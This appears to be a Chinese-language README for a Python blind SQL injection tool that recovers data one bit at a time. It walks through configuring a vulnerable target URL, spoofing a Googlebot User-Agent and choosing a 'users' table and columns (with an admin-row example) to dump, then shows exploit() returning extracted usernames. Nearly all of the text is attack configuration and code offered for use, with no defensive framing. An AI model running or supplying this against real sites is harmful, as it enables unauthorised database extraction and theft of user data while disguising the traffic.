这是一个通过位移法计算字符而非猜测字符的盲SQL注入模块。根据配置,每个字符需要7/8次请求。
import blind-sql-bitshifting as x
# Edit this dictionary to configure attack vectors
x.options
# 易受攻击的链接
x.options["target"] = "http://www.example.com/index.php?id=1"
# 指定Cookie(可选)
x.options["cookies"] = ""
# 指定特定行的条件,例如 'uid=1' 表示管理员(可选)
x.options["row_condition"] = ""
# 布尔选项,是否跟踪重定向
x.options["follow_redirections"] = 0
# 指定User-Agent
x.options["user_agent"] = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
# 指定要转储的表
x.options["table_name"] = "users"
# 指定要转储的列
x.options["columns"] = "id, username"
# 语句执行成功后页面中应出现的验证字符串
x.options["truth_string"] = "<p id='success'>true</p>"
# 请参见下文
x.options["assume_only_ascii"] = 1
assume_only_ascii 选项让模块假设正在转储的字符都是ASCII字符。由于ASCII字符集只到127,我们可以将第一位设置为0,无需计算。这可以减少12.5%的请求。本地测试显示,平均速度提升了15%。当然,如果转储的字符超出ASCII范围,可能会引起问题。默认值为0。
配置完成后:
data = x.exploit()
这会返回一个二维数组,每个子数组包含一行,第一行是列标题。
示例输出:
[['id', 'username'], ['1', 'user1'], ['2', 'user2'], ['3', 'user3'], ['4', 'user4']]
可选地,你的脚本还可以利用 tabulate 模块来输出数据:
from tabulate import tabulate
data = x.exploit()
print tabulate(data,
headers='firstrow', # 指定将第一行作为列标题
tablefmt='psql') # 使用 SQL 输出格式。也可以使用其他格式。
输出结果:
+------+------------+
| id | username |
|------+------------|
| 1 | user1 |
| 2 | user2 |
| 3 | user3 |
| 4 | user4 |
+------+------------+